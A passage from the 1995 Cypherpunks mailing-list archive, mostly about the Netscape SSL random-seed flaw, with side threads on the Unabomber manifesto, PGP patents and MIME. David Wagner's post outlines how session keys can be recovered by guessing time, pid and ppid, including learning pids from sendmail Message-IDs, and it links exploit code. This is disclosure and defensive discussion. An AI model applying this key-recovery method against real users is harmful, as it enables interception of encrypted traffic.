how I feel just now. BTW: the line we tended to stress was "public availability of source to at least the security bits", but who knows how it will come out? Holger.Reif at PrakInf.TU-Ilmenau.DE (Holger Reif ) was kind enough to verify that the SunOS 4.1.3 version of Netscape generates its keys in _exactly_ the same way as Solaris and HP-UX; he says he'll test other architectures tomorrow. I suspect any big-endian machine with the lrand48() function (which is used in key generation on Solaris/HP-UX; it's disguised in unssl.c as the macro mklcpr()) will be the same. Other Unix flavours should require only minor changes. I'm still interested in what Windoze clients do (other than lose). - Ian "So how _did_ Netscape's stock do today?" From rjc at clark.net Tue Sep 19 21:16:26 1995 From: rjc at clark.net (Ray Cromwell) Date: Tue, 19 Sep 95 21:16:26 PDT Subject: WWW: Unabomber Manifesto In-Reply-To: <199509200210.WAA29968@yakko.cs.wmich.edu> Message-ID: <199509200416.AAA18328@clark.net> > > > > The Unabomber Manifesto as published in the September 19th > Washington Post Special Supplement is available in a slightly > HTML-ized version at > > http://yakko.cs.wmich.edu/~frogfarm/unabomb.html The Unabomber's whole argument about "industrial-technological society must continually remove freedoms" and his arguments about the motives of scientists and technologists, are false by existence of modern cryptography and the cypherpunks. The Unabomber's whole argument rests on his lack of imagination. Almost all his arguments about large scalee technology were counterargued years ago on the Extropian's list. The errors in his essay are numerous, for instance, he uses as argument, that medical progress (if that were the only kind of technology) would be bad in and of itself. As an example, he uses diabetes which, if treated, allows the diseased to live longer and pass on their genes. But most forms of diabetes happen at adult onset longer after the individual would have reproduced anyway. His arguments against leftists, while partially correct, are poorly constructed and flawed too. All and all, it wasn't worth the 3 deaths and 17 years of bombings to get tripe like this published. The Unabomber should have found a ghostwriter friend with a degree in philosophy and got him/her to write and publish it. Anyway, the best way to sum up the Unabomber's fantasy world is that people in the past had high self-esteem, they were simple and happy, and didn't have to climb the corporate ladder. Too bad he didn't read any anthropological studies first. -Ray From rsalz at osf.org Tue Sep 19 21:25:55 1995 From: rsalz at osf.org (Rich Salz) Date: Tue, 19 Sep 95 21:25:55 PDT Subject: "Hackers"-- brief review and anecdote... Message-ID: <9509200424.AA18181@sulphur.osf.org> >The question was, essentially, what do you think should happen to a >teenage hacker ... Oops. Sorry for the mistake. /r$ From dvw at hamachi.epr.com Tue Sep 19 21:49:26 1995 From: dvw at hamachi.epr.com (David Van Wie) Date: Tue, 19 Sep 95 21:49:26 PDT Subject: Verification of Random Number Generators Message-ID: <305F9CEC@hamachi> On Tue, 19 Sep 1995 09:04:29 -0700 "Erik E. Fair" wrote: -------- >> >> Just an idle thought: it might be possible to do a probabalistic >> verification of a RNG by sampling it over some number of samples, and >> statistically analyzing the sample space. This would be analysis under the >> model of "RNG as black box" as opposed to (or rather, if you're smart, in >> addition to) code inspection & review. Any statisticians among us? >> >> Erik Fair >> The problem with a statistic is that it assumes an independent variable. If the variable is not truely independent (which happens with some frequency in real world analysis), any purported statistical result is meaningless (undefined, to be more precise). Clearly, the hack of netscape relied on the fact that the vairable was not independent. >But statistical tests of randomness alone do not make a good RNG. >At least, not for cryptographic use. A cryptographically secure >RNG is also unpredictable, i.e., computationally unfeasible to >predict the next random bit will be given the algorithm, and not >reliably reproduced, i.e., multiple runs with the exact same input >do not generate the same sequence. This is almost right. Statistical tests work fine if they are conducted on independent variables. dvw From tcmay at got.net Tue Sep 19 22:18:12 1995 From: tcmay at got.net (Timothy C. May) Date: Tue, 19 Sep 95 22:18:12 PDT Subject: [NOISE] Unabomber - crypto-anarchist?!? Message-ID: My almost-namesake Sherry Mayo wrote: >Found this quote from the Electronic Telegraph, the online version of >a UK daily newspaper. (world news section, Weds 20th Sept) >http://www.telegraph.co.uk/et/access?ac=116192744309&pg=//95/9/20/wunab20.html > >"Editors forced to print manifesto of Unabomber > >By Charles Laurence in New York > >...The heart of his argument is that industrial society has led to ways of >life for which people are fundamentally unsuited. He calls for a >crypto-anarchic revolution and a new order based on small, village-style >units." >^^^^^^^^^^^^^^^ > >Uh? Crypto-anarchic? Surely he's not one of ours? ;-) ;-) ;-) I've read a good chunks of FR's work at http://www.ai.mit.edu/misc/unabomber and have to say he is making some very interesting and incisive arguments, not all of which I disagree with. But I also searched the text for mention of "crypto" and only came up with the fairly standard usage of "crypto leftist." My assumption then is that the meme of crypto anarchy has spread to the writer at that UK newspaper (I wonder if Brian Arthur has been talking to them?) and that he interpret's FR's screed in terms of crypto anarchy? Still, his writing style and some of his points seem close enough to some of my own points, not to mention his Northern California nexus and estimated age, that I'm expecting more inquiries (I deflected one already). After the call from the Sheriff's office about my alleged activities, I wonder.... --Tim May ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^756839 | black markets, collapse of governments. "National borders are just speed bumps on the information superhighway." From cwe at Csli.Stanford.EDU Tue Sep 19 22:24:58 1995 From: cwe at Csli.Stanford.EDU (Christian Wettergren) Date: Tue, 19 Sep 95 22:24:58 PDT Subject: PGP back in legal limbo? [noise] In-Reply-To: <9509200359.AA07322@toad.com> Message-ID: <199509200524.WAA20365@Csli.Stanford.EDU> | >Since PKP (and Bidzos, now president of RSA) always said that DH | >covered all public key encryption, it would seem that any RSA | >licensee would also need a license from Cylink. | | So, I suppose this invalidates the RSA agreement that allows PGP to | be distributed? What "fortunate" timing for the pro GAK folks! Okay, | everybody in US, erase your copies, before the Feral government comes | to get you....... Conspiracy flag on. Did anyone else but me see the discussion organized by Progress & Freedom Foundation at SPAN, I believe yesterday night. John Barlow from EFF was there, and he said a few things that certainly got my attention. He said that the "borders to cyberspace had to be protected", and that the "fight for freedom in cyberspace was fought right now, not in two years, but right now". And that we should "get encryption be deployed out there, either in Europe [i think he said] or embedded as a kind of holographic image in the Net". He also said that he "expected 'blood' to be shed in this fight" (everything taken from memory, not exact quotes) I was surprised at his intensity and outspokeness. I can't get this kind of statements into agreement with the negative picture several other cypherpunkers has painted of EFF. I wonder whether the effort by EFF to put some sensibel input into the official loop is failing, and that is behind his statements? (I haven't seen/heard him make statements earlier, maybe this is his usual way of expression?) Does anyone but me smell an attempt of rewinding part of the widespread use of PGP, because of a "patent problem". I got the GAO report on "requirements for the information highway", and they even included a PGP-encrypted email there. The report was rather positive to protect the privacy of the users, noting that it was a fine balance between many interests - not the "law enforcement only" point of view. Conspiracy flag off. /Christian From khijol!erc Tue Sep 19 22:51:44 1995 From: khijol!erc (Ed Carp [khijol SysAdmin]) Date: Tue, 19 Sep 95 22:51:44 PDT Subject: [NOISE] Unabomber - crypto-anarchist?!? In-Reply-To: Message-ID: On Tue, 19 Sep 1995, Timothy C. May wrote: > Still, his writing style and some of his points seem close enough to some > of my own points, not to mention his Northern California nexus and > estimated age, that I'm expecting more inquiries (I deflected one already). > > After the call from the Sheriff's office about my alleged activities, I > wonder.... Tim May, the UNABOMBER ... too funny for words, hehehe ;) -- Ed Carp, N7EKG Ed.Carp at linux.org, ecarp at netcom.com 214/993-3935 voicemail/pager Finger ecarp at netcom.com for PGP 2.5 public key an88744 at anon.penet.fi Q. What's the trouble with writing an MS-DOS program to emulate Clinton? A. Figuring out what to do with the other 639K of memory. From jsw at neon.netscape.com Tue Sep 19 22:53:59 1995 From: jsw at neon.netscape.com (Jeff Weinstein) Date: Tue, 19 Sep 95 22:53:59 PDT Subject: netscape's response In-Reply-To: <199509192304.QAA05546@infinity.c2.org> Message-ID: <43oa83$nhm@tera.mcom.com> In article <199509192304.QAA05546 at infinity.c2.org>, sameer at c2.org (sameer) writes: > " With this knowledge, an experienced computer programmer could > decrypt messages sent by Netscape Navigator to other computers in a > few hours of computation time." > > Excuse me? A few hours? Try 25 seconds?? DISCLAIMER: my comments below are my opinion, and not necessarily the position of Netscape. Yes, it was < 1 minute if you had captured the client-hello message, and had access to the machine that was running the Navigator, and it was a unix machine and it was not an SGI with a high-resolution timer. If the attacker does not have access to the machine to determine the pid and ppid, then the attack will take longer. If the Navigator is running on an SGI machine with a high resolution cycle counter then it is used as the first of the two 32bit seeds. If the Navigator is running on a Mac or PC, then the two seeds are the current time and the "tick count", which is milliseconds since starting windows for the PC version, and some time unit since booting on the Mac. I believe that it would take much longer than 1 minute to mount an attack against a mac, pc, or unix machine that the attacker was not logged on to. I don't know exactly how the few hour number was calculated, since it was done by marketing with input from someone else in the group. Another interesting data point is that the unix version, which was most vulnerable, accounts for less than 10% of our user base, according to the yahoo random link stats. Of course none of this reduces the magnitude of the screw up/bug/design flaw/whatever. I really can't say which of these it was since I wasn't around at the time that this code was being written. I must admit that the RNG seed code was not an area that I thought to examine when I took over our security library. This was a bad mistake on our part, and we are working hard to fix it. We have been trying to identify sources of random bits on PCs, Macs, and all of the many unix platforms we support. We are looking at stuff that is system dependent, user dependent, hardware dependent, random external sources such as the network and the user. If anyone has specific suggestions I would love to hear them so that we can do a better job. > "Netscape has also begun to engage an external group of world-class > security experts who will review our solution to this problem before > it is sent to customers." > > A group which offered to review the first version, but > Netscape refused. Do you mean that cypherpunks offered to review the netscape code if only we made all the source available on the net? I think that it is unrealistic to expect us to release all of our source code to the net. We will be having at least some of our code reviewed by a wider audience, but I don't yet know which code, or how wide a review group. If anyone has specific suggestions for pieces of code that you would like to see widely reviewed (such as RNG and seed generation) let me know. I realize that some cypherpunks think that we should make all of our code publicly available. In an ideal world that would be great, but we live in a world with politicians, crooks, lawyers, stockholders, etc... Don't expect to see us posting our entire security library source code to cypherpunks. > From their release it looks like they aren't finding a better > source of entropy, but just using *more* sources of entropy. Doesn't > mean that the entropy is good. I would love to hear your suggestions for good sources of entropy on any systems that our products run on. > A T-shirt to the first person to decompile the new Seed code > and post the sources of "entropy" used. Is this offer good for netscape employees? What if I post the code without having had to decompile it? :-) --Jeff -- Jeff Weinstein - Electronic Munitions Specialist Netscape Communication Corporation jsw at netscape.com - http://home.netscape.com/people/jsw Any opinions expressed above are mine. From tcmay at got.net Tue Sep 19 23:02:05 1995 From: tcmay at got.net (Timothy C. May) Date: Tue, 19 Sep 95 23:02:05 PDT Subject: NSA and Netscape Crack Message-ID: At 11:46 PM 9/19/95, Jim Ray wrote: >In the relatively short time I've been on this list, Cypherpunks >have bruted, and then found a weakness in, two kinds of Netscape >software. >[A fine public service, IMO. Congrats to all involved.] > >I don't expect to know NSA's specific brute-force capability, but >does anyone know if the NSA has *ever* found a glaring weakness in >software and then told its author(s) or owner(s) about it? Do "we" >perform the "COMSEC" role Tim was speaking of better than the NSA? Indeed, Jim is underscoring the point I was making, facetiously, that the NSA has abandoned all pretense of helping to actually secure commercial transactions (and no, I wasn't referring to Clipper...rather, I was facetiously referring to the short-lived Commercial COMSEC Endorsement Program, circa 1988-89). As I said in my message, I don't _want_ the NSA or NIST (the same, really) to be vetting commercial encryption. But I also don't want them claiming a role in securing commercial encryption when they clearly are not even doing as much as the Cypherpunks are doing. By the way, if we count our own Matt Blaze's work on exposing weaknesses of the Tessera/Skipjack/Clipper (they blur together) card as a "Cypherpunks achievement," then the Cypherpunks have actually played a dominant role in cracking these recent standards. (Not to mention the RC4 code postings, the various Cypherpunks involved in the RSA-129 and "BlackNet" factorizations, etc.) Well done, of course! --Tim May ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^756839 | black markets, collapse of governments. "National borders are just speed bumps on the information superhighway." From alano at teleport.com Tue Sep 19 23:33:17 1995 From: alano at teleport.com (Alan Olsen) Date: Tue, 19 Sep 95 23:33:17 PDT Subject: netscape broken on NPR Message-ID: <199509200633.XAA18595@desiree.teleport.com> At 03:06 PM 9/19/95 -0500, you wrote: >NPR reported on the security flaw in Netscape, > >3:05 pm CDT. As well as CNN Headline news. (With the big Netscape N logo and everything.) They spent a fair amount of time (for CNN Headline news) on the story. | Minister of Forced Caffinization in the DNRC | alano at teleport.com | |"The moral PGP Diffie taught Zimmerman unites all| Disclaimer: | | mankind free in one-key-steganography-privacy!" | Ignore the man | | -- PGP 2.6.2 key available on request -- | behind the keyboard.| | http://www.teleport.com/~alano | | From shields at tembel.org Tue Sep 19 23:49:33 1995 From: shields at tembel.org (Michael Shields) Date: Tue, 19 Sep 95 23:49:33 PDT Subject: NYT on Netscape Crack In-Reply-To: <199509190748.AAA03614@infinity.c2.org> Message-ID: > The server process itself still needs access to that file > though in order to verify passwords, so it can't be totally > protected-- a bug in the server might reveal the password file. A > relatively minor point.. Actually, it could communicate with a differently-privileged process. The security gain probably isn't worth the performance hit, though. (A possible secure channel: Give the password manager a uid of its own. Have it listen on a unix-domain socket. The server process opens the socket, then fstat()s it to make sure it's really owned by the password manager.) -- Shields. From shields at tembel.org Tue Sep 19 23:52:11 1995 From: shields at tembel.org (Michael Shields) Date: Tue, 19 Sep 95 23:52:11 PDT Subject: Investing on Information We Get Here In-Reply-To: Message-ID: > (These computer lists are really great for investors! I heard about the > Apple problems a few days before they hit the street, and was able to > unload a bunch of shares at $45, a day before it dropped, now down to > around $36. "He who hesitates to act on inside information is lost.") This isn't inside information in the illegal-to-trade-on-in-the-US sense, is it? cypherpunks, while maybe not mainstream, is publicly available. -- Shields. From carolann at censored.org Wed Sep 20 00:02:32 1995 From: carolann at censored.org (Censored Girls Anonymous) Date: Wed, 20 Sep 95 00:02:32 PDT Subject: Netscape closes UNCHANGED! Message-ID: <199509200701.AAA09989@usr2.primenet.com> NSCP is currently trading at $53 3/8 Symbol : NSCP Exchange : NASDAQ Description : NETSCAPE COMMUNICATIONS CORP COM Last Traded at: 53 3/8 Date/Time : Sep 19 4:00 $ Change : 0 % Change : 0.000000 Bid : 53 1/4 Ask : 53 1/2 Volume : 373500 # of Trades : 470 Opening Price : 49 1/4 Last Shares : 21 Day Low : 49 Day High : 53 1/2 52 Week Low : 45 3/4 52 Week High: 74 3/4 -- Member Internet Society - Certified BETSI Programmer - Webmistress *********************************************************************** Carol Anne Braddock (cab8) carolann at censored.org 206.42.112.96 My Homepage The Cyberdoc *********************************************************************** ------------------ PGP.ZIP Part [017/713] ------------------- M8H,),S$8G>&.WP(8IRA`-M['+`Q%&_C"">5-F%LX@<_Q$;*P'',Q$Z/AA[8M MF=O0H+*%(-S%&>S%+FS& http://dcs.ex.ac.uk/~aba/export/ From shields at tembel.org Wed Sep 20 00:02:52 1995 From: shields at tembel.org (Michael Shields) Date: Wed, 20 Sep 95 00:02:52 PDT Subject: MIME In-Reply-To: Message-ID: > I'm dealing with it the same way I'm dealing with the few people who have > something in their MIME setup that triggers my mailer (Eudora Pro 2.1) to > treat their text as attachments. Namely, by filtering them out. Because there were two complaints on this, I'd like to find out why. I'm using a modified version of Elm, Michael Elkins' 2.4PL24ME4 version. Among other features, this adds integrated PGP support, and uses the content-type application/pgp for it. Here is the complete header on the message I sent, as returned: : From owner-cypherpunks at toad.com Sun Sep 17 23:26:25 1995 : Return-Path: : Received: from relay3.UU.NET by yage.tembel.org with smtp : (Smail3.1.29.1 #9) id m0suQWm-000HZ2a; Sun, 17 Sep 95 16:41 EDT : Received: from toad.com by relay3.UU.NET with SMTP : id QQzhpy19217; Sun, 17 Sep 1995 16:30:47 -0400 : Received: by toad.com id AA23554; Sun, 17 Sep 95 13:28:04 PDT : Received: from yage.tembel.org by toad.com id AA23543; Sun, 17 Sep 95 13:27:55 PDT : Received: by yage.tembel.org (Smail3.1.29.1 #9) : id m0suQJV-000HYvC; Sun, 17 Sep 95 20:27 GMT : Message-Id: : From: shields at tembel.org (Michael Shields) : Subject: cypherpunks as a newsgroup : To: cypherpunks at toad.com : Date: Sun, 17 Sep 1995 20:27:43 +0000 (GMT) : X-Dogma: Microsoft is not the answer. : Microsoft is the question. : No is the answer. : Mime-Version: 1.0 : Content-Type: application/pgp : Content-Transfer-Encoding: 7bit : Sender: owner-cypherpunks at toad.com : Precedence: bulk : Content-Length: 1092 I think that it must be the content-type that is causing problems, as the rest of the message is completely standard. To the people whose mailers broke out in hives at that message: Do you get the same behavior with any message having an unknown content-type? -- Shields. From tcmay at got.net Wed Sep 20 00:09:43 1995 From: tcmay at got.net (Timothy C. May) Date: Wed, 20 Sep 95 00:09:43 PDT Subject: netscape's response Message-ID: At 5:53 AM 9/20/95, Jeff Weinstein wrote: > Of course none of this reduces the magnitude of the screw up/bug/design >flaw/whatever. I really can't say which of these it was since I wasn't >around at the time that this code was being written. I must admit that >the RNG seed code was not an area that I thought to examine when I took >over our security library. In _retrospect_ (:-}), the approach taken by Goldberg and Wagner seems pretty obvious. Where PGP, for example, asks the user to go through a laborious process of "generating entropy" through ostensibly-random keyboard button presses, Netscape does not do this. Nor does it, for example, "listen" to a microphone input for some amount of time (to at least make a plausible pretense of gathering entropy), nor does it measure a Zener diode, or count clicks of a Geiger counter, or whatever. The very speed of Netscape's PRNG process suggests the usual weakness in PRNGs: simply not enough entropy. That is, a limited search space allows the guessing of a seed or entry point in a deterministic process. > This was a bad mistake on our part, and we are working hard to fix it. >We have been trying to identify sources of random bits on PCs, Macs, and >all of the many unix platforms we support. We are looking at stuff that >is system dependent, user dependent, hardware dependent, random external >sources such as the network and the user. If anyone has specific >suggestions I would love to hear them so that we can do a better job. I think a reasonable way to generate several hundred seemingly random (or at least highly unpredictable) bits is the "swirling the mouse" approach mentioned by several people. All implementations of Netscape involve mice, I assume, and this is a fairly fast way of generating hard-to-guess bits. Colin Plumb has code to do this, as has been mentioned. (I'm not saying that some number of "mouse swirlings" will generate some number of bits of entropy...this depends on the platform, the granularity of mouse measurements, etc. Better to take several times as many bits as needed and distill them down, with MD5 or other hash functions....can't have too many bits of entropy to start with!) This could be done fairly quickly by Netscape, and doesn't assume the platform has microphones to "measure background noise" or other exotic and nonstandard inputs. Years ago, I recall articles in sci.crypt about getting "pretty good random numbers" from complicated measurements of disk accesses on a local machine, ticks of the system clock, times between keyboard button presses, etc., all mixed and convolved together. Not perfect, of course, but if enough bits are started with (e.g, 2000) when "only" 126 or 512 or whatever are ultimately used, this "mixing" can probably be pretty damned good. At least, I doubt any t-shirts will be won. > Do you mean that cypherpunks offered to review the netscape code >if only we made all the source available on the net? I think that it >is unrealistic to expect us to release all of our source code to the >net. > > We will be having at least some of our code reviewed by a >wider audience, but I don't yet know which code, or how wide a review >group. If anyone has specific suggestions for pieces of code that >you would like to see widely reviewed (such as RNG and seed generation) >let me know. > > I realize that some cypherpunks think that we should make all of >our code publicly available. In an ideal world that would be great, >but we live in a world with politicians, crooks, lawyers, stockholders, >etc... Don't expect to see us posting our entire security >library source code to cypherpunks. I think a better approach is to modularize the functions, so that a "PRNG" chunk could be shown without "damaging" Netscape's market situation. (I doubt the crypto section is seen as Netscape's market edge, and use of industry-verified crypto modules would be a net plus, anyway.) In other words, keep secret (arguably) the things you don't want competitors to have access to. But things like crypto modules are rarely trade secrets--if only because the cores are so often licensed anyway--and can be shown and vetted without affecting the rest of the product. (I said "arguably" because many will argue for showing all of the source code, anyway, as the almost-ultimate check on integrity and reliabilty. And there may be subtle security flaws that hinge on the overall program, not just specific parts.) > I would love to hear your suggestions for good sources of entropy >on any systems that our products run on. See above. This has been a recurring topic in sci.crypt and Cyherpunks---so recurring, in fact, that several of us have expressed bemusement at seeing "yet another "How do I generate entropy" argument." I guess we all (save for Mssrs. Goldberg and Wagner) tacitly assumed that a modern product claiming to have strong crypto would use commonly-accepted techniques for generating enough entropy. (Commonly used in RSA's crypto products, and in PGP.) I suggest you take RSADSI up on their offer to advise you. (Or Cylink, as the case may soon be.) --Tim May ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^756839 | black markets, collapse of governments. "National borders are just speed bumps on the information superhighway." From tcmay at got.net Wed Sep 20 00:12:42 1995 From: tcmay at got.net (Timothy C. May) Date: Wed, 20 Sep 95 00:12:42 PDT Subject: Investing on Information We Get Here Message-ID: At 6:51 AM 9/20/95, Michael Shields wrote: >> (These computer lists are really great for investors! I heard about the >> Apple problems a few days before they hit the street, and was able to >> unload a bunch of shares at $45, a day before it dropped, now down to >> around $36. "He who hesitates to act on inside information is lost.") > >This isn't inside information in the illegal-to-trade-on-in-the-US sense, >is it? cypherpunks, while maybe not mainstream, is publicly available. Didn't you read my last line? "(Yes, I know that I am not an "insider" by SEC definitions. Poetic license.)" --Tim ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^756839 | black markets, collapse of governments. "National borders are just speed bumps on the information superhighway." From tcmay at got.net Wed Sep 20 00:18:58 1995 From: tcmay at got.net (Timothy C. May) Date: Wed, 20 Sep 95 00:18:58 PDT Subject: Netscape sub rosa? Message-ID: At 6:33 AM 9/20/95, Alan Olsen wrote: >At 03:06 PM 9/19/95 -0500, you wrote: >>NPR reported on the security flaw in Netscape, >> >>3:05 pm CDT. > >As well as CNN Headline news. (With the big Netscape N logo and ^^^^^^^^^^^^^^^^^^^ >everything.) They spent a fair amount of time (for CNN Headline news) on >the story. Gee, where's that "Cypherpunks logo" when you really need it? A rose covering the Netscape "N" logo? A crypto eagle swooping down and pecking at weak keys? Netscape sub rosa? --Tim May ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^756839 | black markets, collapse of governments. "National borders are just speed bumps on the information superhighway." From cwe at Csli.Stanford.EDU Wed Sep 20 00:29:33 1995 From: cwe at Csli.Stanford.EDU (Christian Wettergren) Date: Wed, 20 Sep 95 00:29:33 PDT Subject: netscape's response In-Reply-To: <43oa83$nhm@tera.mcom.com> Message-ID: <199509200729.AAA24565@Csli.Stanford.EDU> | Of course none of this reduces the magnitude of the screw up/bug/design | flaw/whatever. I really can't say which of these it was since I wasn't | around at the time that this code was being written. I must admit that | the RNG seed code was not an area that I thought to examine when I took | over our security library. It isn't really easy. I guess you were around to see the pointer to RFC 1750, approx "Security Randomness reqs"? | This was a bad mistake on our part, and we are working hard to fix it. | We have been trying to identify sources of random bits on PCs, Macs, and | all of the many unix platforms we support. We are looking at stuff that | is system dependent, user dependent, hardware dependent, random external | sources such as the network and the user. If anyone has specific | suggestions I would love to hear them so that we can do a better job. * I think you should use as much user-generated randomness as possible, like the mouse movement patterns, interarrival times of events from the user interface etc. * You can also gather statistics from the networking card, like number of collisions, packets in/out, number of passing packets etc. * Measuring the interarrival times of requests/responses from a remote server should also be a good one, I guess. I depends on the network in between, the actual processes executing on it, the scheduling algorithm etc. * And finally, insert some sampling of the noise in the sound blaster. * And try to reseed it, as often as possible and convenient. Make it depend on the previous value of the random generator seed, somehow. The difficult part is to verify the quality of the random seeding and reseeding. How does it behave on a unloaded system? Could someone put your system under some strain, and hence affect the random generator to lock down into a small subspace or even onto a fixed value? How independant are the values anyway? And when you start to talk about ergodity etc, I'm lost anyway. :-) I think it is important to bring together factors of the user _and_ the environment, preferrable an environment that reaches as far from the local site as possible. This makes "jamming" of the random seed selection process harder. The other problem in gathering random bits for a seed is that most bits are visible by someone else close enough within your environment. Interarrival times of packets are fine, but anyone can observe them with quite a good accuracy. How do you escape the "local environment problem"? . - . One wild idea that I just got was to have servers and clients exchange random numbers (not seeds of course), in a kind of chaining way. Since most viewers connect to a number of servers, and all servers are connected to by many clients, they would mix "randomness sources" with each other, making it impossible to observe the local environment only. And the random values would of course be encrypted under the session key, making it impossible to "watch the wire". Problems: * watch out for "multiply by zero" attacks by a rogue server/client. * watch out for "almost singular values" in the same way. * only let one source contribute a certain amount of randomness, like (key length)/(aver # of peers). * never reveal your current seed, only a non-trivially derived random value from it. (of course) * make sure your initial seed is good enough, or the whole thing is broken. * perhaps save part of the previous session state into a protected file, to be able to keep up the quality of the initial seed. I think I like it, perhaps not from a practical point of view as much as the 'non-attackability' of it. Its quite cypher-a. But I bet someone has already done this a long time ago. My usual luck! :-( If not, I want a 'I saved Netscape!' t-shirt from you, Jeff! /Christian PS. I'm a Swede, I don't know if I'm allowed to reveal these state secrets. So please shut your eyes, ok? From dawagner at flagstaff.princeton.edu Wed Sep 20 00:29:58 1995 From: dawagner at flagstaff.princeton.edu (David A. Wagner) Date: Wed, 20 Sep 95 00:29:58 PDT Subject: SSL implementation problem at Netscape In-Reply-To: <43kki8$os7@charm.magnus.acs.ohio-state.edu> Message-ID: <43o47v$fsd@cnn.Princeton.EDU> It looks like there's some confusion about the Netscape security problem Ian Goldberg (iang at cs.berkeley.edu) and I found, as mentioned recently on cypherpunks. If we'd foreseen that such a silly bug would receive so much attention, I think we would've tried to prepare a more comprehensive description... But we didn't. Anyhow, let's see what I can clear up for you now. [Note: Ian isn't here right now, so he hasn't had a chance to look at this. Any errors are mine, any opinions are mine, etc.] In article from sci.crypt, David Sternlight wrote: > If the above is, in fact, accurate it appears to apply to previous > versions of Netscape, not the 2.0 versions for which the public beta goes > out next week. We haven't tried it on v2.0, as we only have a copy of v1.1 right now. But the front-page New York Times article today said that the next version also has the same flaw, and that it'll be fixed before release. A Netscape official press release is available at http://www.netscape.com/newsref/std/random_seed_security.html Also our prototype code can be found at ftp://ftp.csua.berkeley.edu/pub/cypherpunks/cryptanalysis/unssl.c > In addition the flat statement that "keys can now be found > in appx 1 min." is not, as it seems, a general one but (if one reads the > details) requires a number of special assumptions, applies only to some > machines, and applies only if one can develop certain collateral > information. You are partially correct. It all depends on the threat model. If the attacker has user-level access (e.g. an account) on the machine where you run Netscape, your encrypted sessions can be broken quickly. (Our tools took about 1 minute on 1 machine, but was just a proof of concept -- I believe the time could be significantly reduced, and automated completely.) This model is not entirely unreasonable IMHO. If the attacker is simply sniffing the wire somewhere between you and the https: server, and has no account on your machine, things are a bit more complicated. Ian & I are still discussing this case, but I'll mention a few of our observations: * the time, pid, and ppid are mixed together in such a way that there is certainly no more than 47 bits of entropy (which is a far cry from the 128 bits claimed for their commercial domestic version). * the attacker can guess the current time to within a few seconds easily. * maybe the attacker can get this down to about 10 msec uncertainty, possibly even less in some cases. * the ppid is often 1 (e.g. when you start up Netscape from a X-windows menu). * if not 1, the ppid is often just a bit smaller than the pid. * on personal workstations, the pid and ppid are often quite small. * one can remotely determine pid's by talking to sendmail on the attacked machine and bouncing mail -- the pid will usually be in the Message-ID. (if the attacker host runs sendmail, which is a usual case) because pids are assigned sequentially, this leaves very little uncertainty in Netscape's pid. * there's no notion of pid or ppid on MS-DOS: God only knows what Netscape does there. maybe it's just seeded from the time!! * the PRNG is never reseeded for the duration of a cached connection. While we don't yet know exactly how long it would take to break Netscape's PRNG in this threat model, I think it's clear that Netscape's current implementation is insufficient and insecure. You mention that our attack is only applicable to certain machines. You may well be correct -- this is one area where our experiments were still proceeding when the media descended on us today. Certainly the Solaris 2.0 and HP-UX versions of Netscape v1.1 are vulnerable: we tested them ourselves. Ian told me he got email from people who are trying unssl.c on other architectures, and apparently the SunOS 4.x.x version is vulnerable too (and tests of other machines are in progress). We don't know about e.g. PC's yet -- this is another area we were still working on. I will note that Netscape didn't try to claim that any version was safe from this flaw, for what that's worth... Hopefully this will be quickly fixed by Netscape, and then we can all stop worrying about it! :-) David Wagner, daw at cs.berkeley.edu, speaking {for,to} himself From cwe at Csli.Stanford.EDU Wed Sep 20 00:38:41 1995 From: cwe at Csli.Stanford.EDU (Christian Wettergren) Date: Wed, 20 Sep 95 00:38:41 PDT Subject: [NOISE] Unabomber - crypto-anarchist?!? In-Reply-To: Message-ID: <199509200738.AAA25102@Csli.Stanford.EDU> | On Tue, 19 Sep 1995, Timothy C. May wrote: | | > Still, his writing style and some of his points seem close enough to some | > of my own points, not to mention his Northern California nexus and | > estimated age, that I'm expecting more inquiries (I deflected one already ). | > | > After the call from the Sheriff's office about my alleged activities, I | > wonder.... | | Tim May, the UNABOMBER ... too funny for words, hehehe ;) A frame-up, I bet! What bothers me is that the it makes sense from a certain twisted kind of view. Discrediting the group that actually is a problem when it comes to ITAR, and recently has had good publicity. And Tim being one of those who spotted Clipper coming, early on. And the punch line; "Look the terrorists and the crypto anarchists are the SAME guys!" (Tim, not that I agree with your political views, but many Swedes are like that. ;-) ) Why is it that my conspirational sides has blossomed once I joined this group? I've posted more severely conspiritional posts recently than I've done in my whole previous Inet presence. I gotta stop. :-) /Christian From sameer at c2.org Wed Sep 20 00:45:44 1995 From: sameer at c2.org (sameer) Date: Wed, 20 Sep 95 00:45:44 PDT Subject: netscape's response In-Reply-To: <43oa83$nhm@tera.mcom.com> Message-ID: <199509200740.AAA15940@infinity.c2.org> > Is this offer good for netscape employees? What if I post the code > without having had to decompile it? :-) > That depends on whether or not you do it with the approval of your superiors. ;-) Seriously, if you manage to convince the management/whoever-needs-to-decide a significant portion of the security code can be released for public scrutiny, you deserve a t-shirt. The goal here is to have a piece of software we can trust. -- sameer Voice: 510-601-9777 Community ConneXion FAX: 510-601-9734 An Internet Privacy Provider Dialin: 510-658-6376 http://www.c2.org (or login as "guest") sameer at c2.org From jsw at netscape.com Wed Sep 20 00:58:27 1995 From: jsw at netscape.com (Jeff Weinstein) Date: Wed, 20 Sep 95 00:58:27 PDT Subject: netscape's response In-Reply-To: Message-ID: <9509200055.ZM206@tofuhut> Just a clarification of my last message. I didn't mean to imply that we didn't know about using time/position from mouse events, RFC 1750, reading from the microphone. I knew all about this stuff, but made the fatal mistake of assuming that what we shipped in 1.1 was "good enough", and that I could look at it later, after I had dealt with a bunch of other stuff that needed to be done. So far I've received several very thoughtful replies, with lots of good suggestions, most of which I already knew 